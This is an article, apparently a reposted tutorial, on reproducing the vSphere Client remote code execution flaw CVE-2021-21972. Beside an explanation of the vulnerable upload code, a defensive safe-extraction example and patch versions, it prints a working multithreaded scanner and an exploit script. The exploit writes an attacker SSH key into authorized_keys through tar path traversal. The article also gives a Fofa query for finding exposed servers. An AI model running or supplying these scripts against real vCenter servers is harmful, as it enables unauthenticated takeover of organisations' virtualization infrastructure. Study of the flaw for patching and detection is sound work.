2025-01-15 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Many newcomers are unclear about how to reproduce the vSphere Client RCE CVE-2021-21972. To help with this, the editor explains the process in detail below; anyone who needs it can follow along, and I hope you gain something from it.
Brief introduction to the vulnerability
vSphere is a virtualization platform suite from VMware that includes ESXi, vCenter Server and other components. vCenter Server is the control center for ESXi: from a single control point it manages all vSphere hosts and virtual machines in the data center.
The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plug-in. An unauthenticated attacker who can reach port 443 on vCenter Server can send specially crafted requests, write a webshell and take control of the server.
Affected versions
VMware vCenter Server: 7.0 / 6.7 / 6.5
Vulnerability analysis
The vrops plug-in in vCenter Server exposes several sensitive interfaces without any authentication; among them, the uploadova interface provides file upload.
@RequestMapping(value = {"/uploadova"}, method = {RequestMethod.POST})
public void uploadOvaFile(@RequestParam(value = "uploadFile", required = true) CommonsMultipartFile uploadFile,
                          HttpServletResponse response) throws Exception {
    logger.info("Entering uploadOvaFile api");
    int code = uploadFile.isEmpty() ? 400 : 200;
    PrintWriter wr = null;
    // ...
    response.setStatus(code);
    String returnStatus = "SUCCESS";
    if (!uploadFile.isEmpty()) {
        try {
            logger.info("Downloading OVA file has been started");
            logger.info("Size of the file received:" + uploadFile.getSize());
            InputStream inputStream = uploadFile.getInputStream();
            // Fixed extraction directory; it is emptied before every upload.
            File dir = new File("/tmp/unicorn_ova_dir");
            if (!dir.exists()) {
                dir.mkdirs();
            } else {
                String[] entries = dir.list();
                String[] var9 = entries;
                int var10 = entries.length;
                for (int var11 = 0; var11 < var10; ++var11) {
                    String entry = var9[var11];
                    File currentFile = new File(dir.getPath(), entry);
                    currentFile.delete();
                }
                logger.info("Successfully cleaned: /tmp/unicorn_ova_dir");
            }
            // The upload is treated as a tar archive and read entry by entry.
            TarArchiveInputStream in = new TarArchiveInputStream(inputStream);
            TarArchiveEntry entry = in.getNextTarEntry();
            ArrayList result = new ArrayList();
The code then extracts the uploaded tar archive into the /tmp/unicorn_ova_dir directory:
            while (entry != null) {
                if (entry.isDirectory()) {
                    entry = in.getNextTarEntry();
                } else {
                    // entry.getName() comes straight from the archive and is joined
                    // to the base directory without normalisation or validation.
                    File curfile = new File("/tmp/unicorn_ova_dir", entry.getName());
                    File parent = curfile.getParentFile();
                    if (!parent.exists()) {
                        parent.mkdirs();
The code above joins the file name taken from the tar entry directly onto /tmp/unicorn_ova_dir and writes the file there, so an entry name containing ../ escapes the intended directory.
If the target runs Linux, the tar can contain an entry named ../../home/vsphere-ui/.ssh/authorized_keys; once it has been uploaded, SSH can be used to connect to the server.
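A hardened form of the extraction loop above, written in Python as an added example (not vCenter's own code): every entry's joined path is resolved and checked against the destination before anything is written, and link entries are refused as well, a case beyond the one on this page. The archives and the key text it uses are constructed test input.

```python
import io
import os
import tarfile
import tempfile

def build_tar(entries):
    """Build an in-memory tar from a {name: bytes} dict (constructed test input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def safe_extract(tar_bytes, dest_dir):
    """Extract files under dest_dir; resolve each path first, refuse escapes and links."""
    base = os.path.realpath(dest_dir)
    os.makedirs(base, exist_ok=True)
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for entry in tar:
            # Same join the vulnerable code performs, but resolved before any write.
            target = os.path.realpath(os.path.join(base, entry.name))
            if os.path.commonpath([base, target]) != base:
                raise ValueError("path traversal in entry " + repr(entry.name))
            if entry.issym() or entry.islnk():  # links can escape after extraction
                raise ValueError("link entry not allowed: " + repr(entry.name))
            if entry.isdir():
                continue  # parent directories are created as files are written
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as out:
                out.write(tar.extractfile(entry).read())
            written.append(entry.name)
    return written

def demo():
    """Benign OVA-style archive extracts; the authorized_keys traversal is refused."""
    benign = build_tar({"vm/disk.vmdk": b"constructed vmdk bytes"})
    evil = build_tar({"../home/vsphere-ui/.ssh/authorized_keys": b"constructed key"})
    with tempfile.TemporaryDirectory() as root:
        dest = os.path.join(root, "unicorn_ova_dir")
        written = safe_extract(benign, dest)
        try:
            safe_extract(evil, dest)
            refused = False
        except ValueError:
            refused = True
        escaped = os.path.exists(os.path.join(root, "home/vsphere-ui/.ssh/authorized_keys"))
    return {"written": written, "refused": refused, "escaped": escaped}
```

Running demo() returns {'written': ['vm/disk.vmdk'], 'refused': True, 'escaped': False}: the benign entry lands inside the destination and the traversal entry never touches the file system.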
POC & EXP
The POC is from GitHub:
https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/blob/main/CVE-2021-21972.py
# -*- coding: utf-8 -*-
# CVE-2021-21972.py  @time: 2021/02/24  C0de by NebulabdSec-@batsu
import argparse
import http.client
import random
from concurrent.futures import ThreadPoolExecutor

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Force HTTP/1.0 for the probe request.
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"

# Optional proxy for requests, e.g. {"https": "socks5://127.0.0.1:1081"} (needs PySocks).
# The original used a misspelled key ("scoks5"), which requests silently ignored.
PROXIES = {}


def get_ua():
    """Return a randomised Chrome-like User-Agent string."""
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = ['(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
               '(X11; Linux x86_64)', '(Macintosh; Intel Mac OS X 10_12_6)']
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    return ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                     '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])


def CVE_2021_21972(url):
    """Probe the uploadova endpoint: a GET answered with 405 means the unauthenticated
    upload handler is reachable, i.e. the vulnerable plug-in is exposed."""
    headers = {'User-Agent': get_ua(), "Content-Type": "application/x-www-form-urlencoded"}
    target_url = url + TARGET_URI
    try:
        res = requests.get(target_url, headers=headers, timeout=15, verify=False, proxies=PROXIES)
        if res.status_code == 405:
            print("[+] URL: {} - there is a CVE-2021-21972 vulnerability".format(url))
            with open("vulnerable_urls.txt", 'a') as fw:
                fw.write(url + '\n')
        else:
            print("[-] " + url + " No CVE-2021-21972 vulnerability found.\n")
    except requests.RequestException:
        print("[-] " + url + " Request ERROR.\n")


def multithreading(filename, pools=5):
    """Check every URL listed in filename, one per line, using a thread pool."""
    with open(filename, "r") as f:
        urls = [line.rstrip("\n") for line in f if line.strip()]
    with ThreadPoolExecutor(max_workers=pools) as executor:
        executor.map(CVE_2021_21972, urls)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Target URL; Example: http://ip:port")
    parser.add_argument("-f", "--file", help="Url File; Example: url.txt")
    args = parser.parse_args()
    if args.url is not None and args.file is None:
        CVE_2021_21972(args.url)
    elif args.url is None and args.file is not None:
        multithreading(args.file, 10)  # default 10 threads
    else:
        parser.print_help()


if __name__ == "__main__":
    main()
The EXP is from CSDN:
https://blog.csdn.net/weixin_43650289/article/details/114055417
import tarfile
from io import BytesIO

import requests

# Intercepting proxy used by the author (e.g. Burp); remove if none is running.
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}


def return_zip():
    """Write test.tar with a single entry whose name traverses out of
    /tmp/unicorn_ova_dir into the vsphere-ui user's authorized_keys file."""
    id_rsa_pub = 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwgGuwNdSGHKvzHsHt7QImwwJ08Wa/+gHXOt+VwZTD23rLwCGVeYmfKObDY0uFfe2O4jr+sPamgA8As4LwdqtkadBPR+EzZB+PlS66RcVnUnDU4UdMhQjhyj/uv3pdtugugJpB9xaLdrUWwGoOLYA/djxD5hmojGdoYydBezsNhj2xXRyaoq3AZVqh2YLlhpwKnzhodk12a7/7EU+6Zj/ee5jktEwkBsVsDLTTWPpSnzK7r+kAHkbYx8fvO3Fk+9jlwadgbmhHJrpPr8gLEhwvrEnPcK1/j+QXvVkgy2cuYxl9GCUPv2wgZCN50f3wQlaJiektm2S9WkN5dLDdX+X4w=='
    data = id_rsa_pub.encode()
    with tarfile.open("test.tar", 'w') as tar:
        tarinfo = tarfile.TarInfo(name='../home/vsphere-ui/.ssh/authorized_keys')
        tarinfo.size = len(data)
        tar.addfile(tarinfo, fileobj=BytesIO(data))


def getshell(url):
    """Upload test.tar to the unauthenticated uploadova endpoint and print the response."""
    with open('test.tar', 'rb') as f:
        files = {'uploadFile': f}
        try:
            r = requests.post(url=url, files=files, proxies=proxies, verify=False).text
            print(r)
        except requests.RequestException:
            print('false')


if __name__ == "__main__":
    return_zip()
    url = "https://192.168.1.1/ui/vropspluginui/rest/services/uploadova"
    getshell(url)

Vulnerability reproduction
Search Fofa for title="+ID_VC_Welcome+".
Use the POC to verify that the vulnerability exists:
Use the EXP to upload the tar file:
authorized_keys is uploaded successfully.
Remediation
Upgrade vCenter Server 7.0 to 7.0 U1c
Upgrade vCenter Server 6.7 to 6.7 U3l
Upgrade vCenter Server 6.5 to 6.5 U3n